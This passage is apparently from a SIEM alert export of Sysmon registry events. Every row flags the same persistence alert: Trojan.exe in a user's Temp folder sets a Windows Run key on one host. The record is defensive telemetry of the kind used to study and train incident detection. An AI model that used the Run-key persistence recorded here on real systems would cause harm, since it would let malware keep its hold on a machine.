HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:24:54.252"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:05.427",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:53.236 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:53.239099000Z"",""eventRecordID"":""1434"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:53.236\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:53.236"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:05.411",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:52.222 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:52.292739300Z"",""eventRecordID"":""1433"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:52.222\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:52.222"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:22:04.432",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:51.210 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:51.220015900Z"",""eventRecordID"":""1431"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:51.210\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:24:51.210"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:03.339",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:50.205 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:50.210720100Z"",""eventRecordID"":""1430"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:50.205\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:50.205"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:02.317",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:49.190 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:49.197108700Z"",""eventRecordID"":""1429"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:49.190\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:49.190"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:22:01.301",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:48.174 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:48.174903400Z"",""eventRecordID"":""1428"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:48.174\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:24:48.174"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:00.285",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:47.158 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:47.160381200Z"",""eventRecordID"":""1427"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:47.158\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:47.158"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:59.270",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:46.142 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:46.151307400Z"",""eventRecordID"":""1426"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:46.142\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:46.142"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:21:58.238",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:45.127 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:45.128983100Z"",""eventRecordID"":""1425"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:45.127\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:24:45.127"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:57.223",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:44.111 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:44.116528700Z"",""eventRecordID"":""1423"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:44.111\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:44.111"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:56.209",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:43.095 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:43.099824800Z"",""eventRecordID"":""1422"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:43.095\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 